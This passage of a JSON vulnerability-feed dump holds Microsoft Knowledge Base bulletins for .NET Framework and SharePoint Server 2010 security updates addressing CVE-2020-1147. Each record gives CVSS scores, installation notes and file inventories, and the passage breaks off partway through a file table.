against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-14T16:57:25", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4566518)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T16:57:25", "id": "KB4566518", "href": "https://support.microsoft.com/en-us/help/4566518/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:35:26", "description": "<html><body><p>Security and Quality Rollup for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4566517)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Notice</h2><p>On July 23, 2020, update KB4565616\u00a0v2, KB4565623 v2, and KB4565636 v2 were\u00a0released to replace v1 of those updates for .NET Framework 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, and\u00a04.8 for Windows 7 Service Pack 1 (SP1) and Windows Server 2008 R2 SP1. The v1 updates did not install for customers who had certain ESU configurations. \u00a0The v2 updates correct\u00a0the issue for customers who could not install the v1 updates. \u00a0</p><p><br/>If you have already installed\u00a0v1 of these updates, no action is necessary. \u00a0</p><p><br/>To obtain\u00a0v2\u00a0of these updates, see the \u201cHow to obtain and install the update\u201d section of the individual update\u00a0article.\u00a0 Links to each article are found in the \"<a bookmark-id=\"Additional information\" href=\"#Additional information\" managed-link=\"\">Additional information about this update section</a>\" of this article.</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong> Verify that you have installed the required updates listed in the <strong>How to get this update</strong> section before installing this update.\u3000 </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT\u3000</strong>Some customers who use Windows Server 2008 R2 SP1 and have activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key.\u3000Re-activation on the affected devices should only be required once.\u202f For information on activation, see this <a href=\"https://aka.ms/Windows7ESU/t_blank\"><u>blog</u></a> post. </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong>\u3000WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1.\u3000If you have a subset of devices running these operating systems without ESU, they might show as\u3000non-compliant in your patch management and compliance toolsets. </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong>\u3000Customers who have purchased the <a href=\"https://www.microsoft.com/en-us/cloud-platform/extended-security-updates\"><u>Extended Security Update (ESU)</u></a> for on-premises versions of these operating systems must follow the procedures in <a href=\"https://support.microsoft.com/en-us/help/4522133/procedure-to-continue-receiving-security-updates\"><u>KB4522133</u></a> to continue receiving security updates after extended support ends on January 14, 2020.\u3000For more information on ESU and which editions are supported, see <a href=\"https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates\"><u>KB4497181</u></a>. </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong>\u3000Starting on January 15, 2020, a full-screen notification will appear that describes the risk of continuing to use Windows 7 Service Pack 1 after it reaches end of support on January 14, 2020. The notification will remain on the screen until you interact with it. This notification will only appear on the following\u3000editions of Windows 7 Service Pack 1: </p> <ul> <li>Starter.</li> <li>Home Basic.</li> <li>Home Premium.</li> <li> Professional. If you have purchased the Extended Security Update (ESU), the notification\u3000will not appear. For more information, see <a href=\"https://techcommunity.microsoft.com/t5/windows-it-pro-blog/archived-how-to-get-extended-security-updates-for-eligible/ba-p/917807\"><u>How to get Extended Security Updates for eligible Windows devices</u></a> and <a href=\"https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates\"><u>Lifecycle FAQ-Extended Security Updates</u></a>. </li> <li>Ultimate.\u3000</li> </ul> <p align=\"LEFT\" dir=\"LTR\"> <strong>Note\u3000</strong>The notification will not appear on domain-joined machines or machines in kiosk mode. </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong> Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see <span><span><a href=\"https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update\">KB 4474419</a>. </span></span></p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong> All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </p> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><h2>Additional information about this update</h2><div><span><a id=\"Additional information\" name=\"Additional information\"></a>The following articles contain additional information about this update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span> <a href=\"https://support.microsoft.com/help/4565612\" managed-link=\"\">4565612</a> <span>Description of the Security and Quality Rollup for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4565612)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4565616\" managed-link=\"\">4565616</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4565616)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4565623\" managed-link=\"\">4565623</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4565623)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4565636\" managed-link=\"\">4565636</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4565636)</span> </span></li></ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-23T21:01:50", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4566517)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-23T21:01:50", "id": "KB4566517", "href": "https://support.microsoft.com/en-us/help/4566517/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:49:59", "description": "<html><body><p>July 14, 2020-KB4566516 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 10 Version 1809 and Windows Server 2019</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>July 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 3.5, 4.7.2 and 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4565625\" managed-link=\"\">4565625</a> <span>Description of the Cumulative Update for .NET Framework 3.5 and 4.7.2 for Windows 10 Version 1809 and Windows Server 2019 (KB4565625)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4565632\" managed-link=\"\">4565632</a> <span>Description of the Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1809 and Windows Server 2019 (KB4565632)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "mskb", "title": "July 14, 2020-KB4566516 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 10 Version 1809 and Windows Server 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T16:57:27", "id": "KB4566516", "href": "https://support.microsoft.com/en-us/help/4566516/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:36:56", "description": "<html><body><p>July 14, 2020-KB4565627 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 2004</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>July 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 3.5 and 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><table class=\"table\"> <tbody> <tr> <td> <strong>Release Channel</strong> </td> <td align=\"center\"> <strong>Available</strong> </td> <td> <strong>Next Step</strong> </td> </tr> <tr> <td>Windows Update and Microsoft Update</td> <td align=\"center\">Yes</td> <td>None. This update will be downloaded and installed automatically from Windows Update.</td> </tr> <tr> <td>Microsoft Update Catalog</td> <td align=\"center\">Yes</td> <td> To get the standalone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4565627\">Microsoft Update Catalog</a> website. </td> </tr> <tr> <td>Windows Server Update Services (WSUS)</td> <td align=\"center\">Yes</td> <td> <p> This update will automatically sync with WSUS if you configure <strong>Products and Classifications</strong> as follows: </p> <p> <strong>Product</strong>:Windows 10 Version 2004</p> <strong>Classification</strong>: Security Updates </td> </tr> </tbody> </table><p></p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/c/b/8/cb8598c1-afd2-4172-8c0a-b2df1dac13a9/4565627.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "mskb", "title": "July 14, 2020-KB4565627 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 2004", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T16:57:26", "id": "KB4565627", "href": "https://support.microsoft.com/en-us/help/4565627/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:21:30", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see the following security advisories:\n\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1450>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1451](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1451>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1456>)\n**Note** To apply this security update, you must have the release version of [Service Pack 2 for Microsoft SharePoint Server 2010](<http://support.microsoft.com/kb/2687453>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4484460>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4484460 for the 64-bit version of SharePoint Server 2010](<http://www.microsoft.com/download/details.aspx?familyid=b4e4a624-a324-45ea-ad72-86c73dd1b457>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 14, 2020](<https://support.microsoft.com/en-us/help/20200714>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4484414](<http://support.microsoft.com/kb/4484414>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \ncoreserver2010-kb4484460-fullfile-x64-glb.exe| 36289AB43593178780ED6B84DC1CA479058014DA| B7D688B6F935B065E60D05A613CF99577613B2D835ABA87223A85C761E41C271 \n \nFile informationThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x64-based versions of SharePoint Server 2010\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \naccountjoiner.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| accountjoiner.dll| 4.0.2450.49| 199,272| 11-Sep-2018| 05:22 \nacrmset.asx| changesitemasterpage.aspx| | 12,859| 07-Sep-2018| 11:41 \nacsacnt.apx| contentaccessaccount.aspx| | 6,501| 07-Sep-2018| 04:12 \nacscntrl.acx| addcontentsourcecontrol.ascx| | 24,836| 07-Sep-2018| 04:12 \nacset.asx| areacachesettings.aspx| | 10,763| 07-Sep-2018| 11:41 \nactivityfeed.aspx| activityfeed.aspx| | 199| 07-Sep-2018| 04:17 \nactivityinformation.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| activityinformation.sql| | 7,994| 07-Sep-2018| 03:39 \naddbestbet1.aspx| addbestbet.aspx| | 13,538| 07-Sep-2018| 04:12 \naddcs.apx| addcontentsource.aspx| | 11,219| 07-Sep-2018| 04:12 \naddentity1.aspx| addentity.aspx| | 8,933| 07-Sep-2018| 04:12 \naddfeaturedcontent1.aspx| addfeaturedcontent.aspx| | 12,520| 07-Sep-2018| 04:12 \naddfedl.apx| addfederatedlocation.aspx| | 69,245| 07-Sep-2018| 04:12 \naddgroup.asx| cmsslwpaddeditgroup.aspx| | 6,273| 07-Sep-2018| 11:41 \naddkeyword1.aspx| addkeyword.aspx| | 10,121| 07-Sep-2018| 04:12 \naddlink.asx| cmsslwpaddeditlink.aspx| | 18,595| 07-Sep-2018| 11:41 \naddmanagedproperty1.aspx| addmanagedproperty.aspx| | 19,211| 07-Sep-2018| 04:12 \naddnavlk.asx| addnavigationlinkdialog.aspx| | 8,762| 11-Sep-2018| 02:06 \naddrankpromotion1.aspx| addrankpromotion.aspx| | 13,398| 07-Sep-2018| 04:12 \naddshr.apx| addsitehitrule.aspx| | 7,812| 07-Sep-2018| 04:12 \naddsnm.apx| addservernamemappings.aspx| | 12,736| 07-Sep-2018| 04:12 \naddspellcheck1.aspx| addspellcheck.aspx| | 9,798| 07-Sep-2018| 04:12 \naddtype.apx| addfiletype.aspx| | 12,429| 07-Sep-2018| 04:12 \naddusercontext1.aspx| addusercontext.aspx| | 7,723| 07-Sep-2018| 04:12 \nadgalmaattributeinclusionlis.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmaattributeinclusionlist.xml| | 3,423| 07-Sep-2018| 03:39 \nadgalmadata.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmadata.xml| | 53,984| 07-Sep-2018| 03:39 \nadgalmamandatoryattributelis.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmamandatoryattributelist.xml| | 2,738| 07-Sep-2018| 03:39 \nadgalmamandatoryobjectclassl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmamandatoryobjectclasslist.xml| | 229| 07-Sep-2018| 03:39 \nadgalmaobjectclassinclusionl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmaobjectclassinclusionlist.xml| | 254| 07-Sep-2018| 03:39 \nadgalmvdata.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmvdata.xml| | 88,941| 07-Sep-2018| 03:39 \nadmaattributeinclusionlist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admaattributeinclusionlist.xml| | 1,551| 07-Sep-2018| 03:39 \nadmamandatoryattributelist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admamandatoryattributelist.xml| | 53| 07-Sep-2018| 03:39 \nadmamandatoryobjectclasslist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admamandatoryobjectclasslist.xml| | 120| 07-Sep-2018| 03:39 \nadmaobjectclassinclusionlist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admaobjectclassinclusionlist.xml| | 206| 07-Sep-2018| 03:39 \nadmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admapropertypages.dll| 4.0.2450.49| 223,856| 11-Sep-2018| 05:22 \nadministratorsettingssection.ascx| administratorsettingssection.ascx| | 5,375| 07-Sep-2018| 03:31 \nadminlistcontrol1.ascx| adminlistcontrol.ascx| | 4,252| 07-Sep-2018| 04:12 \nadsearch.aspx| advancedsearchlayout.aspx| | 17,270| 07-Sep-2018| 04:12 \naduisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| aduisettinginit.xml| | 595| 07-Sep-2018| 03:39 \nadvanced_aspx| advanced.aspx| | 16,244| 07-Sep-2018| 04:12 \nadvsfast_aspx| advanced.aspx| | 286| 07-Sep-2018| 04:12 